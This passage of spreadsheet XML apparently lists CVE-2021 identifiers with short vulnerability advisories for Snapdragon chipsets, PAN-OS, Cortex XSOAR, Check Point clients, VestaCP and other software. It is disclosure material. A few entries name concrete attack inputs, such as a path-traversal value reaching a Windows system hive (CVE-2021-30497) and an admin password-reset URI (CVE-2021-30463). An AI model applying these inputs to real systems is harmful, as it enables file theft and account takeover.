    <t>Improper validation of maximum size of data write to EFS file can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30324</t>
  </si>
  <si>
    <t>Possible out of bound write due to lack of boundary check for the maximum size of buffer when sending a DCI packet to remote process in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30325</t>
  </si>
  <si>
    <t>Possible out of bound access of DCI resources due to lack of validation process and resource allocation in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30326</t>
  </si>
  <si>
    <t>Possible assertion due to improper size validation while processing the DownlinkPreemption IE in an RRC Reconfiguration/RRC Setup message in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30327</t>
  </si>
  <si>
    <t>Buffer overflow in sahara protocol while processing commands leads to overwrite of secure configuration data in Snapdragon Mobile, Snapdragon Compute, Snapdragon Auto, Snapdragon IOT, Snapdragon Connectivity, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-30328</t>
  </si>
  <si>
    <t>Possible assertion due to improper validation of invalid NR CSI-IM resource configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30329</t>
  </si>
  <si>
    <t>Possible assertion due to improper validation of TCI configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-3033</t>
  </si>
  <si>
    <t>An improper verification of cryptographic signature vulnerability exists in the Palo Alto Networks Prisma Cloud Compute console. This vulnerability enables an attacker to bypass signature validation during SAML authentication by logging in to the Prisma Cloud Compute console as any authorized user. This issue impacts: All versions of Prisma Cloud Compute 19.11, Prisma Cloud Compute 20.04, and Prisma Cloud Compute 20.09; Prisma Cloud Compute 20.12 before update 1. Prisma Cloud Compute SaaS version is not impacted by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-30330</t>
  </si>
  <si>
    <t>Possible null pointer dereference due to improper validation of APE clip in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30331</t>
  </si>
  <si>
    <t>Possible buffer overflow due to improper data validation of external commands sent via DIAG interface in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30332</t>
  </si>
  <si>
    <t>Possible assertion due to improper validation of OTA configuration in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30333</t>
  </si>
  <si>
    <t>Improper validation of buffer size input to the EFS file can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30334</t>
  </si>
  <si>
    <t>Possible use after free due to lack of null check of DRM file status after file structure is freed in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30335</t>
  </si>
  <si>
    <t>Possible assertion in QOS request due to improper validation when multiple add or update request are received simultaneously in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30336</t>
  </si>
  <si>
    <t>Possible out of bound read due to lack of domain input validation while processing APK close session request in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30337</t>
  </si>
  <si>
    <t>Possible use after free when process shell memory is freed using IOCTL call and process initialization is in progress in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30338</t>
  </si>
  <si>
    <t>Improper input validation in TrustZone memory transfer interface can lead to information disclosure in Snapdragon Compute</t>
  </si>
  <si>
    <t>CVE-2021-30339</t>
  </si>
  <si>
    <t>Reading PRNG output may lead to improper key generation due to lack of buffer validation in Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3034</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability exists in Cortex XSOAR software where the secrets configured for the SAML single sign-on (SSO) integration can be logged to the '/var/log/demisto/' server logs when testing the integration during setup. This logged information includes the private key and identity provider certificate used to configure the SAML SSO integration. This issue impacts: Cortex XSOAR 5.5.0 builds earlier than 98622; Cortex XSOAR 6.0.1 builds earlier than 830029; Cortex XSOAR 6.0.2 builds earlier than 98623; Cortex XSOAR 6.1.0 builds earlier than 848144.</t>
  </si>
  <si>
    <t>CVE-2021-30340</t>
  </si>
  <si>
    <t>Reachable assertion due to improper validation of coreset in PDCCH configuration in SA mode in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30341</t>
  </si>
  <si>
    <t>Improper buffer size validation of DSM packet received can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30342</t>
  </si>
  <si>
    <t>Improper integrity check can lead to race condition between tasks PDCP and RRC? after a valid RRC Command packet has been received in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30343</t>
  </si>
  <si>
    <t>Improper integrity check can lead to race condition between tasks PDCP and RRC? after a valid RRC Command packet has been received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30344</t>
  </si>
  <si>
    <t>Improper authorization of a replayed LTE security mode command can lead to a denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30345</t>
  </si>
  <si>
    <t>RPM secure Stream can access any secure resource due to improper SMMU configuration in Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30346</t>
  </si>
  <si>
    <t>CVE-2021-30347</t>
  </si>
  <si>
    <t>Improper integrity check can lead to race condition between tasks PDCP and RRC? right after a valid RRC Command packet has been received in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Industrial IOT, Snapdragon Mobile</t>
  </si>
  <si>
    <t>CVE-2021-30348</t>
  </si>
  <si>
    <t>Improper validation of LLM utility timers availability can lead to denial of service in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music</t>
  </si>
  <si>
    <t>CVE-2021-30349</t>
  </si>
  <si>
    <t>Improper access control sequence for AC database after memory allocation can lead to possible memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-3035</t>
  </si>
  <si>
    <t>An unsafe deserialization vulnerability in Bridgecrew Checkov by Prisma Cloud allows arbitrary code execution when processing a malicious terraform file. This issue impacts Checkov 2.0 versions earlier than Checkov 2.0.26. Checkov 1.0 versions are not impacted.</t>
  </si>
  <si>
    <t>CVE-2021-30350</t>
  </si>
  <si>
    <t>Lack of MBN header size verification against input buffer can lead to memory corruption in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30351</t>
  </si>
  <si>
    <t>An out of bound memory access can occur due to improper validation of number of frames being passed during music playback in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2021-30353</t>
  </si>
  <si>
    <t>Improper validation of function pointer type with actual function signature can lead to assertion in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Voice &amp; Music, Snapdragon Wearables</t>
  </si>
  <si>
    <t>CVE-2021-30354</t>
  </si>
  <si>
    <t>Amazon Kindle e-reader prior to and including version 5.13.4 contains an Integer Overflow that leads to a Heap-Based Buffer Overflow in function CJBig2Image::expand() and results in a memory corruption that leads to code execution when parsing a crafted PDF book.</t>
  </si>
  <si>
    <t>CVE-2021-30355</t>
  </si>
  <si>
    <t>Amazon Kindle e-reader prior to and including version 5.13.4 improperly manages privileges, allowing the framework user to elevate privileges to root.</t>
  </si>
  <si>
    <t>CVE-2021-30356</t>
  </si>
  <si>
    <t>A denial of service vulnerability was reported in Check Point Identity Agent before R81.018.0000, which could allow low privileged users to overwrite protected system files.</t>
  </si>
  <si>
    <t>CVE-2021-30357</t>
  </si>
  <si>
    <t>SSL Network Extender Client for Linux before build 800008302 reveals part of the contents of the configuration file supplied, which allows partially disclosing files to which the user did not have access.</t>
  </si>
  <si>
    <t>CVE-2021-30358</t>
  </si>
  <si>
    <t>Mobile Access Portal Native Applications who's path is defined by the administrator with environment variables may run applications from other locations by the Mobile Access Portal Agent.</t>
  </si>
  <si>
    <t>CVE-2021-30359</t>
  </si>
  <si>
    <t>The Harmony Browse and the SandBlast Agent for Browsers installers must have admin privileges to execute some steps during the installation. Because the MS Installer allows regular users to repair their installation, an attacker running an installer before 90.08.7405 can start the installation repair and place a specially crafted binary in the repair folder, which runs with the admin privileges.</t>
  </si>
  <si>
    <t>CVE-2021-3036</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability exists in Palo Alto Networks PAN-OS software where secrets in PAN-OS XML API requests are logged in cleartext to the web server logs when the API is used incorrectly. This vulnerability applies only to PAN-OS appliances that are configured to use the PAN-OS XML API and exists only when a client includes a duplicate API parameter in API requests. Logged information includes the cleartext username, password, and API key of the administrator making the PAN-OS XML API request.</t>
  </si>
  <si>
    <t>CVE-2021-30360</t>
  </si>
  <si>
    <t>Users have access to the directory where the installation repair occurs. Since the MS Installer allows regular users to run the repair, an attacker can initiate the installation repair and place a specially crafted EXE in the repair folder which runs with the Check Point Remote Access Client privileges.</t>
  </si>
  <si>
    <t>CVE-2021-30361</t>
  </si>
  <si>
    <t>The Check Point Gaia Portal's GUI Clients allowed authenticated administrators with permission for the GUI Clients settings to inject a command that would run on the Gaia OS.</t>
  </si>
  <si>
    <t>CVE-2021-3037</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability exists in Palo Alto Networks PAN-OS software where the connection details for a scheduled configuration export are logged in system logs. Logged information includes the cleartext username, password, and IP address used to export the PAN-OS configuration to the destination server.</t>
  </si>
  <si>
    <t>CVE-2021-3038</t>
  </si>
  <si>
    <t>A denial-of-service (DoS) vulnerability in Palo Alto Networks GlobalProtect app on Windows systems allows a limited Windows user to send specifically-crafted input to the GlobalProtect app that results in a Windows blue screen of death (BSOD) error. This issue impacts: GlobalProtect app 5.1 versions earlier than GlobalProtect app 5.1.8; GlobalProtect app 5.2 versions earlier than GlobalProtect app 5.2.4.</t>
  </si>
  <si>
    <t>CVE-2021-3039</t>
  </si>
  <si>
    <t>An information exposure through log file vulnerability exists in the Palo Alto Networks Prisma Cloud Compute Console where a secret used to authorize the role of the authenticated user is logged to a debug log file. Authenticated Operator role and Auditor role users with access to the debug log files can use this secret to gain Administrator role access for their active session in Prisma Cloud Compute. Prisma Cloud Compute SaaS versions were automatically upgraded to the fixed release. This issue impacts all Prisma Cloud Compute versions earlier than Prisma Cloud Compute 21.04.412.</t>
  </si>
  <si>
    <t>CVE-2021-3040</t>
  </si>
  <si>
    <t>An unsafe deserialization vulnerability in Bridgecrew Checkov by Prisma Cloud allows arbitrary code execution when processing a malicious terraform file. This issue impacts Checkov 2.0 versions earlier than Checkov 2.0.139. Checkov 1.0 versions are not impacted.</t>
  </si>
  <si>
    <t>CVE-2021-3041</t>
  </si>
  <si>
    <t>A local privilege escalation vulnerability exists in the Palo Alto Networks Cortex XDR agent on Windows platforms that enables an authenticated local Windows user to execute programs with SYSTEM privileges. This requires the user to have the privilege to create files in the Windows root directory or to manipulate key registry values. This issue impacts: Cortex XDR agent 5.0 versions earlier than Cortex XDR agent 5.0.11; Cortex XDR agent 6.1 versions earlier than Cortex XDR agent 6.1.8; Cortex XDR agent 7.2 versions earlier than Cortex XDR agent 7.2.3; All versions of Cortex XDR agent 7.2 without content update release 171 or a later version.</t>
  </si>
  <si>
    <t>CVE-2021-3042</t>
  </si>
  <si>
    <t>A local privilege escalation (PE) vulnerability exists in the Palo Alto Networks Cortex XDR agent on Windows platforms that enables an authenticated local Windows user to execute programs with SYSTEM privileges. Exploiting this vulnerability requires the user to have file creation privilege in the Windows root directory (such as C:\). This issue impacts: All versions of Cortex XDR agent 6.1 without content update 181 or a later version; All versions of Cortex XDR agent 7.2 without content update 181 or a later version; All versions of Cortex XDR agent 7.3 without content update 181 or a later version. Cortex XDR agent 5.0 versions are not impacted by this issue. Content updates are required to resolve this issue and are automatically applied for the agent.</t>
  </si>
  <si>
    <t>CVE-2021-3043</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability exists in the Prisma Cloud Compute web console that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console while an authenticated administrator is using that web interface. Prisma Cloud Compute SaaS versions were automatically upgraded to the fixed release. No additional action is required for these instances. This issue impacts: Prisma Cloud Compute 20.12 versions earlier than Prisma Cloud Compute 20.12.552; Prisma Cloud Compute 21.04 versions earlier than Prisma Cloud Compute 21.04.439.</t>
  </si>
  <si>
    <t>CVE-2021-3044</t>
  </si>
  <si>
    <t>An improper authorization vulnerability in Palo Alto Networks Cortex XSOAR enables a remote unauthenticated attacker with network access to the Cortex XSOAR server to perform unauthorized actions through the REST API. This issue impacts: Cortex XSOAR 6.1.0 builds later than 1016923 and earlier than 1271064; Cortex XSOAR 6.2.0 builds earlier than 1271065. This issue does not impact Cortex XSOAR 5.5.0, Cortex XSOAR 6.0.0, Cortex XSOAR 6.0.1, or Cortex XSOAR 6.0.2 versions. All Cortex XSOAR instances hosted by Palo Alto Networks are upgraded to resolve this vulnerability. No additional action is required for these instances.</t>
  </si>
  <si>
    <t>CVE-2021-3045</t>
  </si>
  <si>
    <t>An OS command argument injection vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator to read any arbitrary file from the file system. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.19; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.10. PAN-OS 10.0 and later versions are not impacted.</t>
  </si>
  <si>
    <t>CVE-2021-30454</t>
  </si>
  <si>
    <t>An issue was discovered in the outer_cgi crate before 0.2.1 for Rust. A user-provided Read instance receives an uninitialized memory buffer from KeyValueReader.</t>
  </si>
  <si>
    <t>CVE-2021-30455</t>
  </si>
  <si>
    <t>An issue was discovered in the id-map crate through 2021-02-26 for Rust. A double free can occur in IdMap::clone_from upon a .clone panic.</t>
  </si>
  <si>
    <t>CVE-2021-30456</t>
  </si>
  <si>
    <t>An issue was discovered in the id-map crate through 2021-02-26 for Rust. A double free can occur in get_or_insert upon a panic of a user-provided f function.</t>
  </si>
  <si>
    <t>CVE-2021-30457</t>
  </si>
  <si>
    <t>An issue was discovered in the id-map crate through 2021-02-26 for Rust. A double free can occur in remove_set upon a panic in a Drop impl.</t>
  </si>
  <si>
    <t>CVE-2021-30458</t>
  </si>
  <si>
    <t>An issue was discovered in Wikimedia Parsoid before 0.11.1 and 0.12.x before 0.12.2. An attacker can send crafted wikitext that Utils/WTUtils.php will transform by using a &lt;meta&gt; tag, bypassing sanitization steps, and potentially allowing for XSS.</t>
  </si>
  <si>
    <t>CVE-2021-30459</t>
  </si>
  <si>
    <t>A SQL Injection issue in the SQL Panel in Jazzband Django Debug Toolbar before 1.11.1, 2.x before 2.2.1, and 3.x before 3.2.1 allows attackers to execute SQL statements by changing the raw_sql input field of the SQL explain, analyze, or select form.</t>
  </si>
  <si>
    <t>CVE-2021-3046</t>
  </si>
  <si>
    <t>An improper authentication vulnerability exists in Palo Alto Networks PAN-OS software that enables a SAML authenticated attacker to impersonate any other user in the GlobalProtect Portal and GlobalProtect Gateway when they are configured to use SAML authentication. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.19; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.9; PAN-OS 10.0 versions earlier than PAN-OS 10.0.5. PAN-OS 10.1 versions are not impacted.</t>
  </si>
  <si>
    <t>CVE-2021-30461</t>
  </si>
  <si>
    <t>A remote code execution issue was discovered in the web UI of VoIPmonitor before 24.61. When the recheck option is used, the user-supplied SPOOLDIR value (which might contain PHP code) is injected into config/configuration.php.</t>
  </si>
  <si>
    <t>CVE-2021-30462</t>
  </si>
  <si>
    <t>VestaCP through 0.9.8-24 allows the admin user to escalate privileges to root because the Sudo configuration does not require a password to run /usr/local/vesta/bin scripts.</t>
  </si>
  <si>
    <t>CVE-2021-30463</t>
  </si>
  <si>
    <t>VestaCP through 0.9.8-24 allows attackers to gain privileges by creating symlinks to files for which they lack permissions. After reading the RKEY value from user.conf under the /usr/local/vesta/data/users/admin directory, the admin password can be changed via a /reset/?action=confirm&amp;user=admin&amp;code= URI. This occurs because chmod is used unsafely.</t>
  </si>
  <si>
    <t>CVE-2021-30464</t>
  </si>
  <si>
    <t>OMICRON StationGuard before 1.10 allows remote attackers to cause a denial of service (connectivity outage) via crafted tcp/20499 packets to the CTRL Ethernet port.</t>
  </si>
  <si>
    <t>CVE-2021-30465</t>
  </si>
  <si>
    <t>runc before 1.0.0-rc95 allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.</t>
  </si>
  <si>
    <t>CVE-2021-30468</t>
  </si>
  <si>
    <t>A vulnerability in the JsonMapObjectReaderWriter of Apache CXF allows an attacker to submit malformed JSON to a web service, which results in the thread getting stuck in an infinite loop, consuming CPU indefinitely. This issue affects Apache CXF versions prior to 3.4.4; Apache CXF versions prior to 3.3.11.</t>
  </si>
  <si>
    <t>CVE-2021-30469</t>
  </si>
  <si>
    <t>A flaw was found in PoDoFo 0.9.7. An use-after-free in PoDoFo::PdfVecObjects::Clear() function can cause a denial of service via a crafted PDF file.</t>
  </si>
  <si>
    <t>CVE-2021-3047</t>
  </si>
  <si>
    <t>A cryptographically weak pseudo-random number generator (PRNG) is used during authentication to the Palo Alto Networks PAN-OS web interface. This enables an authenticated attacker, with the capability to observe their own authentication secrets over a long duration on the PAN-OS appliance, to impersonate another authenticated web interface administrator's session. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.19; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.10; PAN-OS 10.0 versions earlier than PAN-OS 10.0.4. PAN-OS 10.1 versions are not impacted.</t>
  </si>
  <si>
    <t>CVE-2021-30470</t>
  </si>
  <si>
    <t>A flaw was found in PoDoFo 0.9.7. An uncontrolled recursive call among PdfTokenizer::ReadArray(), PdfTokenizer::GetNextVariant() and PdfTokenizer::ReadDataType() functions can lead to a stack overflow.</t>
  </si>
  <si>
    <t>CVE-2021-30471</t>
  </si>
  <si>
    <t>A flaw was found in PoDoFo 0.9.7. An uncontrolled recursive call in PdfNamesTree::AddToDictionary function in src/podofo/doc/PdfNamesTree.cpp can lead to a stack overflow.</t>
  </si>
  <si>
    <t>CVE-2021-30472</t>
  </si>
  <si>
    <t>A flaw was found in PoDoFo 0.9.7. A stack-based buffer overflow in PdfEncryptMD5Base::ComputeOwnerKey function in PdfEncrypt.cpp is possible because of a improper check of the keyLength value.</t>
  </si>
  <si>
    <t>CVE-2021-30473</t>
  </si>
  <si>
    <t>aom_image.c in libaom in AOMedia before 2021-04-07 frees memory that is not located on the heap.</t>
  </si>
  <si>
    <t>CVE-2021-30474</t>
  </si>
  <si>
    <t>aom_dsp/grain_table.c in libaom in AOMedia before 2021-03-30 has a use-after-free.</t>
  </si>
  <si>
    <t>CVE-2021-30475</t>
  </si>
  <si>
    <t>aom_dsp/noise_model.c in libaom in AOMedia before 2021-03-24 has a buffer overflow.</t>
  </si>
  <si>
    <t>CVE-2021-30476</t>
  </si>
  <si>
    <t>HashiCorp Terraform’s Vault Provider (terraform-provider-vault) did not correctly configure GCE-type bound labels for Vault’s GCP auth method. Fixed in 2.19.1.</t>
  </si>
  <si>
    <t>CVE-2021-30477</t>
  </si>
  <si>
    <t>An issue was discovered in Zulip Server before 3.4. A bug in the implementation of replies to messages sent by outgoing webhooks to private streams meant that an outgoing webhook bot could be used to send messages to private streams that the user was not intended to be able to send messages to.</t>
  </si>
  <si>
    <t>CVE-2021-30478</t>
  </si>
  <si>
    <t>An issue was discovered in Zulip Server before 3.4. A bug in the implementation of the can_forge_sender permission (previously is_api_super_user) resulted in users with this permission being able to send messages appearing as if sent by a system bot, including to other organizations hosted by the same Zulip installation.</t>
  </si>
  <si>
    <t>CVE-2021-30479</t>
  </si>
  <si>
    <t>An issue was discovered in Zulip Server before 3.4. A bug in the implementation of the all_public_streams API feature resulted in guest users being able to receive message traffic to public streams that should have been only accessible to members of the organization.</t>
  </si>
  <si>
    <t>CVE-2021-3048</t>
  </si>
  <si>
    <t>Certain invalid URL entries contained in an External Dynamic List (EDL) cause the Device Server daemon (devsrvr) to stop responding. This condition causes subsequent commits on the firewall to fail and prevents administrators from performing commits and configuration changes even though the firewall remains otherwise functional. If the firewall then restarts, it results in a denial-of-service (DoS) condition and the firewall stops processing traffic. This issue impacts: PAN-OS 9.0 versions earlier than PAN-OS 9.0.14; PAN-OS 9.1 versions earlier than PAN-OS 9.1.9; PAN-OS 10.0 versions earlier than PAN-OS 10.0.5. PAN-OS 8.1 and PAN-OS 10.1 versions are not impacted.</t>
  </si>
  <si>
    <t>CVE-2021-30480</t>
  </si>
  <si>
    <t>Zoom Chat through 2021-04-09 on Windows and macOS allows certain remote authenticated attackers to execute arbitrary code without user interaction. An attacker must be within the same organization, or an external party who has been accepted as a contact. NOTE: this is specific to the Zoom Chat software, which is different from the chat feature of the Zoom Meetings and Zoom Video Webinars software.</t>
  </si>
  <si>
    <t>CVE-2021-30481</t>
  </si>
  <si>
    <t>Valve Steam through 2021-04-10, when a Source engine game is installed, allows remote authenticated users to execute arbitrary code because of a buffer overflow that occurs for a Steam invite after one click.</t>
  </si>
  <si>
    <t>CVE-2021-30482</t>
  </si>
  <si>
    <t>In JetBrains UpSource before 2020.1.1883, application passwords were not revoked correctly</t>
  </si>
  <si>
    <t>CVE-2021-30483</t>
  </si>
  <si>
    <t>isomorphic-git before 1.8.2 allows Directory Traversal via a crafted repository.</t>
  </si>
  <si>
    <t>CVE-2021-30485</t>
  </si>
  <si>
    <t>An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_internal_dtd(), while parsing a crafted XML file, performs incorrect memory handling, leading to a NULL pointer dereference while running strcmp() on a NULL pointer.</t>
  </si>
  <si>
    <t>CVE-2021-30486</t>
  </si>
  <si>
    <t>SysAid 20.3.64 b14 is affected by Blind and Stacker SQL injection via AssetManagementChart.jsp (GET computerID), AssetManagementChart.jsp (POST group1), AssetManagementList.jsp (GET computerID or group1), or AssetManagementSummary.jsp (GET group1).</t>
  </si>
  <si>
    <t>CVE-2021-30487</t>
  </si>
  <si>
    <t>In the topic moving API in Zulip Server 3.x before 3.4, organization administrators were able to move messages to streams in other organizations hosted by the same Zulip installation.</t>
  </si>
  <si>
    <t>CVE-2021-3049</t>
  </si>
  <si>
    <t>An improper authorization vulnerability in the Palo Alto Networks Cortex XSOAR server enables an authenticated network-based attacker with investigation read permissions to download files from incident investigations of which they are aware but are not a part of. This issue impacts: All Cortex XSOAR 5.5.0 builds; Cortex XSOAR 6.1.0 builds earlier than 12099345. This issue does not impact Cortex XSOAR 6.2.0 versions.</t>
  </si>
  <si>
    <t>CVE-2021-30490</t>
  </si>
  <si>
    <t>upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-30493</t>
  </si>
  <si>
    <t>Multiple system services installed alongside the Razer Synapse 3 software suite perform privileged operations on entries within the ChromaBroadcast subkey. These privileged operations consist of file name concatenation of a runtime log file that is used to store runtime log information. In other words, an attacker can create a file in an unintended directory (with some limitations).</t>
  </si>
  <si>
    <t>CVE-2021-30494</t>
  </si>
  <si>
    <t>Multiple system services installed alongside the Razer Synapse 3 software suite perform privileged operations on entries within the Razer Chroma SDK subkey. These privileged operations consist of file name concatenation of a runtime log file that is used to store runtime log information. In other words, an attacker can create a file in an unintended directory (with some limitations).</t>
  </si>
  <si>
    <t>CVE-2021-30496</t>
  </si>
  <si>
    <t>** DISPUTED ** The Telegram app 7.6.2 for iOS allows remote authenticated users to cause a denial of service (application crash) if the victim pastes an attacker-supplied message (e.g., in the Persian language) into a channel or group. The crash occurs in MtProtoKitFramework. NOTE: the vendor's perspective is that "this behavior can't be considered a vulnerability."</t>
  </si>
  <si>
    <t>CVE-2021-30497</t>
  </si>
  <si>
    <t>Ivanti Avalanche (Premise) 6.3.2 allows remote unauthenticated users to read arbitrary files via Absolute Path Traversal. The imageFilePath parameter processed by the /AvalancheWeb/image endpoint is not verified to be within the scope of the image folder, e.g., the attacker can obtain sensitive information via the C:/Windows/system32/config/system.sav value.</t>
  </si>
  <si>
    <t>CVE-2021-30498</t>
  </si>
  <si>
    <t>A flaw was found in libcaca. A heap buffer overflow in export.c in function export_tga might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2021-30499</t>
  </si>
  <si>
    <t>A flaw was found in libcaca. A buffer overflow of export.c in function export_troff might lead to memory corruption and other potential consequences.</t>
  </si>
  <si>
    <t>CVE-2021-3050</t>
  </si>
  <si>
    <t>An OS command injection vulnerability in the Palo Alto Networks PAN-OS web interface enables an authenticated administrator to execute arbitrary OS commands to escalate privileges. This issue impacts: PAN-OS 9.0 version 9.0.10 through PAN-OS 9.0.14; PAN-OS 9.1 version 9.1.4 through PAN-OS 9.1.10; PAN-OS 10.0 version 10.0.7 and earlier PAN-OS 10.0 versions; PAN-OS 10.1 version 10.1.0 through PAN-OS 10.1.1. Prisma Access firewalls and firewalls running PAN-OS 8.1 versions are not impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-30500</t>
  </si>
  <si>
    <t>Null pointer dereference was found in upx PackLinuxElf::canUnpack() in p_lx_elf.cpp,in version UPX 4.0.0. That allow attackers to execute arbitrary code and cause a denial of service via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-30501</t>
  </si>
  <si>
    <t>An assertion abort was found in upx MemBuffer::alloc() in mem.cpp, in version UPX 4.0.0. The flow allows attackers to cause a denial of service (abort) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-30502</t>
  </si>
  <si>
    <t>The unofficial vscode-ghc-simple (aka Simple Glasgow Haskell Compiler) extension before 0.2.3 for Visual Studio Code allows remote code execution via a crafted workspace configuration with replCommand.</t>
  </si>
  <si>
    <t>CVE-2021-30503</t>
  </si>
  <si>
    <t>The unofficial GLSL Linting extension before 1.4.0 for Visual Studio Code allows remote code execution via a crafted glslangValidatorPath in the workspace configuration.</t>
  </si>
  <si>
    <t>CVE-2021-30504</t>
  </si>
  <si>
    <t>In JetBrains IntelliJ IDEA before 2021.1, DoS was possible because of unbounded resource allocation.</t>
  </si>
  <si>
    <t>CVE-2021-30506</t>
  </si>
  <si>
